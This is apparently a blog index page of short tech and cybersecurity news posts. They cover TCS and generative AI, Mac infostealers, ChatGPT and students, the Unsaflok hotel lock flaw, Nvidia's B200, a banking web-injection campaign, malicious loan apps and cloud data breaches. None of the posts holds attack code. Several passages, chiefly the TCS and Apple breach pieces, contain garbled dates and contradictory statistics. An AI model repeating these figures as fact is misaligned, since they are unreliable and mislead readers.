These factors have forced businesses to postpone investments in new technology projects due to the risk associated with such uncertainties. The CEO explained that considering TCS's revenue growth declined by 3% in 2005 as a result of this uncertainty. The chairman goes on to explain that TCS itself has an ongoing pipeline of generative AI projects of $900 million worth, he continues. It was also Krithivasan who stated during the announcement of TCS's Q4 financial results that the company have seen greater traction in the market since its AI. 

The cloud business unit was launched during the quarter. According to Krithivasan, TCS is also working on projects of generative AI, and as reported by the Financial Times, for the quarter ended at the end of the third quarter, the value of the project had doubled to be worth $900 million, an increase of 80% over the prior quarter. According to him, in the following quarters, order flows are expected to increase significantly. 

According to Krithivasan, this would not hurt employment if the demand for tech talent is increased, but not decreased as a consequence of this situation. His advice is that they need to train their workforce if they are to meet this demand, especially in India, where there is a high demand. According to the third quarter earnings report published on April 12 by the biggest IT services firm in India on the Fourth quarter earnings for the financial year 2023-24 (Q4 FY24), the company posted a net profit of Rs 12,434 crore, up 9.1 per cent from the third quarter. 

A revenue of Rs 61,237 crore was also reported for the quarter, an increase of 3.5 per cent from the previous quarter, corresponding to an increase of one per cent over the year-ago quarter. The notable difference between generative AI and traditional AI, however, is that Krithivasan warns that the benefits of generative AI shouldn't be overestimated, despite the expected disruptions. 

Krithivasan, the CEO of TCS, acknowledged the current buzz surrounding AI and its potential impact on jobs, but he stressed that its true effects will unfold gradually, possibly presenting new job opportunities rather than simply displacing existing ones. Addressing concerns about job losses, Krithivasan expressed confidence in the rising demand for tech talent, especially in countries like India. 

He proposed that the evolution of AI would result in the emergence of more skilled professionals, ultimately leading to job growth rather than reduction. However, a recent report from McKinsey Global Institute titled "Generative AI and the Future of Work in America" paints a contrasting picture. According to the report, jobs involving tasks that can be automated, such as data collection and repetitive duties, will likely be taken over by AI to enhance efficiency. 

Sectors like office support, customer service, and food service are expected to be particularly impacted by this AI-driven transformation, potentially leading to significant changes in employment dynamics.
Read more »
Software
Cyber Security information theft Mac Malware Threat Pop-ups Software

Macs Vulnerable to Info-Stealing Malware via Ads and Fake Software

 

As cyber threats continue to evolve, Mac users are increasingly finding themselves in the crosshairs of malicious actors. In recent developments, a new strain of malware has emerged, posing a significant risk to Mac users worldwide. This malware, designed to steal sensitive information, is spread through deceptive ads and fake software, highlighting the importance of vigilance and robust security measures for Mac users. 

The emergence of this info-stealing malware underscores the evolving landscape of cyber threats targeting Mac users. Historically, Macs have been perceived as less susceptible to malware compared to other operating systems like Windows. However, as Mac usage has surged in recent years, cybercriminals have shifted their focus to exploit vulnerabilities in macOS, the operating system powering Mac devices. 

One of the primary vectors for the spread of this malware is through deceptive advertisements and fake software downloads. These ads often masquerade as legitimate offers or updates, enticing users to click on them unsuspectingly. Once clicked, users may inadvertently download malicious software onto their Mac devices, compromising their security and privacy. 

Furthermore, fake software downloads present another avenue for malware distribution. Cybercriminals create counterfeit versions of popular software applications, such as antivirus programs or productivity tools, and distribute them through unofficial channels. Unsuspecting users may download these fake applications, unaware of the malware lurking within. The consequences of falling victim to info-stealing malware can be severe. 

Once installed on a Mac device, this malware can harvest sensitive information, including login credentials, financial data, and personal files. This stolen information can then be used for various malicious purposes, such as identity theft, financial fraud, or extortion. To protect against this growing threat, Mac users must remain vigilant and adopt proactive security measures. 

Firstly, it is essential to exercise caution when encountering online advertisements and software downloads. Users should only download software from trusted sources, such as official app stores or reputable websites, and avoid clicking on suspicious ads or links. Additionally, maintaining up-to-date security software is crucial for detecting and mitigating malware threats. Mac users should invest in reputable antivirus and antimalware solutions that provide real-time protection against emerging threats. 

Regularly updating macOS and installed applications can also patch known vulnerabilities and strengthen overall security. Furthermore, practicing good cybersecurity hygiene is essential for safeguarding personal information and sensitive data. This includes using strong, unique passwords for online accounts, enabling two-factor authentication where available, and avoiding the use of public Wi-Fi networks for sensitive activities. 

In the event of a suspected malware infection, Mac users should take immediate action to mitigate the threat. This may involve running a full system scan using antivirus software, removing any detected malware, and resetting compromised passwords to prevent unauthorized access to accounts. Overall, the rise of info-stealing malware targeting Mac users serves as a stark reminder of the importance of cybersecurity awareness and preparedness. 

By staying informed about emerging threats, adopting proactive security measures, and practicing good cybersecurity hygiene, Mac users can minimize their risk of falling victim to malicious attacks. With cyber threats continuing to evolve, maintaining a vigilant stance against malware remains paramount for protecting personal information and ensuring a safe digital environment.
Read more »
University
Artificial Intelligence ChatGPT Procastination Software Student Technology University

Assessing ChatGPT Impact: Memory Loss, Student Procrastination

 


In a study published in the International Journal of Educational Technology in Higher Education, researchers concluded that students are more likely to use ChatGPT, an artificial intelligence tool based on generative artificial intelligence when overwhelmed with academic work. The study also revealed that ChatGPT is correlated with procrastination, memory loss, and a decrease in academic performance, as well as a concern about the future. 

 Using generative AI in education has been shown to have a profound impact in terms of its widespread use and potential drawbacks. The very fact that advanced AI programs have been available in public for only a short while has already raised a great deal of concern. AI has created a lot of dangers in the past few years, from people using the programs to produce work that was not their own, and taking credit for it, to AI impersonating celebrities with no consent of the celebrity. 

The legislature is finding it hard to keep up. AI software programs like ChatGPT, however, have been found to have negative psychological effects on students, including memory loss, which is an unfortunate new side effect that has yet to be discovered. A study has shown that students who use artificial intelligence software such as ChatGPT are more likely to perform poorly academically, suffer memory loss, and procrastinate more frequently, according to the study. 

It has been found that 32% of university students already use the AI chatbot ChatGPT every week, and it can generate convincing answers to simple text prompts. Several new studies have found that university students who use ChatGPT to complete assignments fall into a vicious circle where they don’t give themselves enough time to complete their assignments, they need to rely on ChatGPT to complete them, and their ability to remember facts gradually weakens over time. 

A study by the University of Oxford found that students who had heavy workloads and a lot of time pressure were more likely to use ChatGPT than those who had less sensitive rewards. They did, however, find a correlation between the degree to which a student reflects on their conscientiousness regarding work quality and the extent to which they use ChatGPT. This study found that students who frequently used ChatGPT procrastinated more than students who rarely used ChatGPT. 

This study was conducted in two phases, allowing the researchers to gain a better understanding of these dynamics. As part of the study, a scale was developed and validated to assess the use of ChatGPT as an academic tool by university students. Following expert evaluations of content validity, the original 12 items were reduced to 10 after the initial set of 12 items had been generated. 

Eventually, the final selection of eight items was made through exploratory factor analysis and reliability testing, which resulted in an effective measure of the extent to which ChatGPT has been used for academic purposes. Researchers conducted three surveys of students to determine who is most likely to use ChatGPT, and how easily users experience the consequences. 

To investigate whether ChatGPT is having any beneficial effects, the researchers asked a series of questions. A thesis was published that stated students who rely on AI because they feel overwhelmed by all of the work they have to do probably do so in a bid to save time as they feel overwhelmed by all of their work. Hence it might have been concluded from the results that ChatGPT may have been a tool that would be used mainly by students who had already been struggling academically. 

The advancement of artificial intelligence can be amazing, as exemplified by its recent use to recreate Marilyn Monroe's personality, but the dangers of a system allowing for super-intelligence cannot be ignored. There is no doubt that artificial intelligence is becoming more advanced every day. At the end of the research, the researchers found that high use of ChatGPT was linked to detrimental outcomes for the participants. 

ChatGPT has been reported to be a cause of memory loss in students and a lower overall GPA in these students. Researchers advise that educators should assign students activities, assignments, or projects that cannot be completed by ChatGPT so students are actively engaged in critical thinking and problem-solving activities, the study's authors recommend. To mitigate ChatGPT's adverse effects on a student's learning journey and mental capabilities, this can be said to be a beneficial factor.
Read more »
Unauthorized access
Cyber Attacks Hacker attack Hotel Personal Security Breach Safety concerns Software Unauthorized access

How Hackers Breached 3 Million Hotel Keycard Locks

 

The Unsaflok hack technique has raised concerns about the security of Saflok hotel locks. This sophisticated method exploits vulnerabilities in Saflok's system, potentially compromising the safety of guests and the reputation of hospitality establishments. 

The Unsaflok hack technique, first uncovered by security researchers, demonstrates how cybercriminals can exploit weaknesses in the Saflok electronic locking system to gain unauthorized access to hotel rooms. By leveraging a combination of hardware and software tools, hackers can bypass the locks' security mechanisms, granting them entry without leaving any visible signs of tampering. 

The implications of such a breach are profound. Beyond the immediate security risks to guests and their belongings, a compromised locking system can tarnish a hotel's reputation and lead to financial losses. Moreover, the trust between guests and hospitality providers, essential for maintaining customer loyalty, can be severely undermined. 

To mitigate the risks associated with the Unsaflok hack technique and similar threats, hotel operators must take proactive steps to enhance their security measures. Firstly, conducting a thorough assessment of existing locking systems to identify vulnerabilities is crucial. This includes examining both hardware and software components for any weaknesses that could be exploited by hackers. Implementing robust access control measures is essential for safeguarding against unauthorized entry. This may involve upgrading to newer, more secure locking systems that incorporate advanced encryption techniques and tamper-resistant features. 

Additionally, deploying intrusion detection systems and surveillance cameras can help detect and deter unauthorized access attempts in real-time. Regular security audits and penetration testing can provide valuable insights into the effectiveness of existing security measures and identify areas for improvement. By staying vigilant and proactive in addressing potential vulnerabilities, hotel operators can minimize the risk of falling victim to cyberattacks and protect the safety and privacy of their guests.

Furthermore, fostering a culture of cybersecurity awareness among staff members is critical. Employees should receive comprehensive training on identifying and reporting suspicious activities, as well as adhering to best practices for safeguarding sensitive information. By empowering staff to play an active role in cybersecurity defense, hotels can create a more resilient security posture. 

The Unsaflok hack technique highlights the importance of robust cybersecurity measures in the hospitality industry. By understanding the vulnerabilities inherent in electronic locking systems and taking proactive steps to enhance security, hotels can mitigate the risks posed by cyber threats and ensure the safety and satisfaction of their guests. Ultimately, investing in cybersecurity is not just a matter of protecting assets; it's a commitment to maintaining trust and reputation in an increasingly digital world.
Read more »
Technology
AI technology Automotive Industry Cloud Computing Electric Vehicles NVIDIA robotics technology Software Technology

Nvidia Unveils Latest AI Chip, Promising 30x Faster Performance

 

Nvidia, a dominant force in the semiconductor industry, has once again raised the bar with its latest unveiling of the B200 "Blackwell" chip. Promising an astonishing 30 times faster performance than its predecessor, this cutting-edge AI chip represents a significant leap forward in computational capabilities. The announcement was made at Nvidia's annual developer conference, where CEO Jensen Huang showcased not only the groundbreaking new chip but also a suite of innovative software tools designed to enhance system efficiency and streamline AI integration for businesses. 

The excitement surrounding the conference was palpable, with attendees likening the atmosphere to the early days of tech presentations by industry visionaries like Steve Jobs. Bob O'Donnell from Technalysis Research, who was present at the event, remarked, "the buzz was in the air," underscoring the anticipation and enthusiasm for Nvidia's latest innovations. 

One of the key highlights of the conference was Nvidia's collaboration with major tech giants such as Amazon, Google, Microsoft, and OpenAI, all of whom expressed keen interest in leveraging the capabilities of the new B200 chip for their cloud-computing services and AI initiatives. With an 80% market share and a track record of delivering cutting-edge solutions, Nvidia aims to solidify its position as a leader in the AI space. 

In addition to the B200 chip, Nvidia also announced plans for a new line of chips tailored for automotive applications. These chips will enable functionalities like in-vehicle chatbots, further expanding the scope of AI integration in the automotive industry. Chinese electric vehicle manufacturers BYD and Xpeng have already signed up to incorporate Nvidia's new chips into their vehicles, signalling strong industry endorsement. 

Furthermore, Nvidia demonstrated its commitment to advancing robotics technology by introducing a series of chips specifically designed for humanoid robots. This move underscores the company's versatility and its role in shaping the future of AI-powered innovations across various sectors. Founded in 1993, Nvidia initially gained recognition for its graphics processing chips, particularly in the gaming industry. 

However, its strategic investments in machine learning capabilities have propelled it to the forefront of the AI revolution. Despite facing increasing competition from rivals like AMD and Intel, Nvidia remains a dominant force in the market, capitalizing on the rapid expansion of AI-driven technologies. As the demand for AI solutions continues to soar, Nvidia's latest advancements position it as a key player in driving innovation and shaping the trajectory of AI adoption in the business world. With its track record of delivering high-performance chips and cutting-edge software tools, Nvidia is poised to capitalize on the myriad opportunities presented by the burgeoning AI market.
Read more »
Websites
Cyberattacks CyberCrime Cybersecurity IBM JavaScript malware Software Web Injections Websites

Sophisticated Web Injection Campaign Targets 50,000 Individuals, Pilfering Banking Data


Web injections, a favoured technique employed by various banking Trojans, have been a persistent threat in the realm of cyberattacks. These malicious injections enable cybercriminals to manipulate data exchanges between users and web browsers, potentially compromising sensitive information. 

In a new finding, it has been revealed that the malware campaign that first came to light in March 2023 has used JavScript web injections in an attempt to steal data from over 50 banks, belonging to around 50,000 used in North America, South America, Europe, and Japan.  

IBM Security has dissected some JavaScript code that was injected into people's online banking pages to steal their login credentials, saying 50,000 user sessions with more than 40 banks worldwide were compromised by the malicious software in 2023. As IBM’s researchers explained, it all starts with a malware infection on the victim’s endpoint. 

After that, when the victim visits a malicious site, the malware will inject a new script tag which is then loaded into the browser and modifies the website’s content. That allows the attackers to grab passwords and intercept multi-factor authentication codes and one-time passwords.

IBM says this extra step is unusual, as most malware performs web injections directly on the web page. This new approach makes the attacks more stealthy, as static analysis checks are unlikely to flag the simpler loader script as malicious while still permitting dynamic content delivery, allowing attackers to switch to new second-stage payloads if needed. 

It's also worth noting that the malicious script resembles legitimate JavaScript content delivery networks (CDN), using domains like cdnjs[.]com and unpkg[.]com, to evade detection. Furthermore, the script performs checks for specific security products before execution. Judging by the evidence to hand, it appears the Windows malware DanaBot, or something related or connected to it, infects victims' PCs – typically from spam emails and other means – and then waits for the user to visit their bank website. 

At that point, the malware kicks in and injects JavaScript into the login page. This injected code executes on the page in the browser and intercepts the victim's credentials as they are entered, which can be passed to fraudsters to exploit to drain accounts. The script is fairly smart: it communicates with a remote command-and-control (C2) server, and removes itself from the DOM tree – deletes itself from the login page, basically – once it's done its thing, which makes it tricky to detect and analyze. 

The malware can perform a series of nefarious actions, and these are based on a "mlink" flag the C2 sends. In total, there are nine different actions that the malware can perform depending on the "mlink" value. These include injecting a prompt for the user's phone number or two-factor authentication token, which the miscreants can use with the intercepted username and password to access the victim's bank account and steal their cash. 

The script can also inject an error message on the login page that says the banking services are unavailable for 12 hours. "This tactic aims to discourage the victim from attempting to access their account, providing the threat actor with an opportunity to perform uninterrupted actions," Langus said. Other actions include injecting a page loading overlay as well as scrubbing any injected content from the page.  

"This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state," Langus warned. "The malware represents a significant danger to the security of financial institutions and their customers." Cybercriminals are exploiting sophisticated web injection techniques to compromise over 50,000 banks throughout the world as a threat escalating. 

DanaBot or similar malware entails the manipulation of user data through JavaScript injections, which allows them to steal login credentials with ease. In this dynamic attack detected by IBM Security, malicious scripts are injected directly into banking pages, evading conventional detection methods, and resulting in a dynamic attack. 

As a way to prevent malware infections, users are recommended to keep their software up-to-date, enable multi-factor authentication, and exercise caution when opening emails to prevent malware infections. To ensure that we are protected from the evolving and adaptive nature of advanced cyber threats, we must maintain enhanced vigilance in identifying and reporting suspicious activities.
Read more »
Software
Android Apple Cyber Security Google Google Play Store iPhone Malicious actor Software

17 Risky Apps Threatening Your Smartphone Security

Users of Google Android and Apple iPhone smartphones have recently received a vital warning to immediately remove certain apps from their devices. The programs that were found to be potentially dangerous have been marked as posing serious concerns to the security and privacy of users.

The alarming revelation comes as experts uncover 17 dangerous apps that have infiltrated the Google Play Store and Apple App Store, putting millions of users at risk of malware and other malicious activities. These apps, primarily disguised as loan-related services, have been identified as major culprits in spreading harmful software.

The identified dangerous apps that demand immediate deletion include:

  1. AA Kredit
  2. Amor Cash
  3. GuayabaCash
  4. EasyCredit
  5. Cashwow
  6. CrediBus
  7. FlashLoan
  8. PréstamosCrédito
  9. Préstamos De Crédito-YumiCash
  10. Go Crédito
  11. Instantáneo Préstamo
  12. Cartera grande
  13. Rápido Crédito
  14. Finupp Lending
  15. 4S Cash
  16. TrueNaira
  17. EasyCash

According to a report by Forbes, the identified apps can compromise sensitive information and expose users to financial fraud. Financial Express also emphasizes the severity of the issue, urging users to take prompt action against these potential threats.

Google's Play Store, known for its extensive collection of applications, has been identified as the main distributor of these malicious apps. A study highlights the need for users to exercise caution while downloading apps from the platform. The study emphasizes the importance of app store policies in curbing the distribution of harmful software.

Apple, recognizing the gravity of the situation, has announced its intention to make changes to the App Store policies. In response to the evolving landscape of threats and the increasing sophistication of malicious actors, the tech giant aims to enhance its security measures and protect its user base.

The urgency of the situation cannot be overstated, as the identified apps can potentially compromise personal and financial information. Users must heed the warnings and take immediate action by deleting these apps from their devices.

The recent discovery of harmful programs penetrating well-known app shops serves as a sobering reminder of the constant dangers inherent in the digital world. Users need to prioritize their internet security and be on the lookout. In an increasingly linked world, it's critical to regularly check installed apps, remain aware of potential threats, and update device security settings.



Read more »
Software
Cyberattacks CyberCrime Cybersecurity Data Breach Microsoft Network Software

Apple's Alarming Data Breach: 2.5 Billion Records at Risk

 


Earlier this week, a report commissioned by Apple highlighted, yet again, why end-to-end encryption must be used when protecting sensitive data against theft and misuse, and why analysts have long recommended it. 

In the report, a professor at the Massachusetts Institute of Technology has conducted an independent review of publicly reported breaches which has been conducted for the tech giant in response to the report. The study found that ransomware campaigns and attacks on trusted technology vendors over the past two years have been responsible for a dramatic increase in data breaches and the number of records that have been compromised due to these breaches. 

The number of records exposed for the first time in 2021 and 2022 had reached a staggering 2.6 billion, with 1.5 billion of those records being exposed last year alone. Considering the trends so far this year, it is highly likely that this number will be even higher in 2023.

There have already been 20% more data breaches in the first nine months of 2023 alone, compared to all of 2022 combined, and the 2017 number is only 20% lower than the 17% increase in 2022. By the end of August 2023, it is estimated that 360 million sensitive records belong to around 360 companies and institutions that were exposed as a result of corporate and institutional breaches. 

A study published in the Apple report states that 95% of organizations that experienced a recent breach had experienced at least one other breach in the past, according to IBM's Cost of a Data Breach Study, as well as a Forrester study quoted in the Apple report. 

Within the last 12 months, 75 per cent of the respondents had experienced at least one incident involving data compromise. In addition to the study's findings, 98% of companies currently have a relationship with a technology vendor that has suffered at least one recent data breach as part of their contract with them. 

Fortra, 3CX, Progress Software, and Microsoft are just a few of the organizations and individuals that were affected by breaches involving vendors and vendor technologies. These breaches have impacted a wide range of organizations and individuals. When considering encryption plans, organizations should also be aware of the rapid growth and adoption of cloud computing.

In Apple's study, data that was analyzed showed that over 80% of breaches involved cloud-stored data. As a result of these issues, it may be more challenging to encrypt data on the cloud than to encrypt it in a physical location. In organizations with good security practices, Ken Dunham, director of Cyber Threats at Qualys, says that good security practices usually give organizations a good level of visibility over their legacy networks. 

Nevertheless, if they migrate to the cloud, they often lose the ability to be able to control, see, manage, and operate in a way that is similar to what they have in place in the past when it comes to encryption." He adds that maintaining a hybrid network that combines legacy and modern technologies is a new layer of complexity for organizations when they embark on digital transformation initiatives. 

Considering the cloud as a primary provider of data encryption can be a mistake for organizations, says Ben-Ari: "While cloud providers offer valuable security measures, it is the organizations' responsibility to ensure that they encrypt their data." In addition, he recommended that organizations prioritize technologies that are user-friendly and easy to implement so that any disruption to existing operations will be minimized when they are implemented in phases.

The last recommendation he makes is that organizations make use of the shared responsibility model that many cloud providers and leading SaaS vendors offer, which provides organizations with the capability to bring a wide range of advanced encryption features to their users at a single click right from their browsers.
Read more »
Subscribe to: Posts (Atom)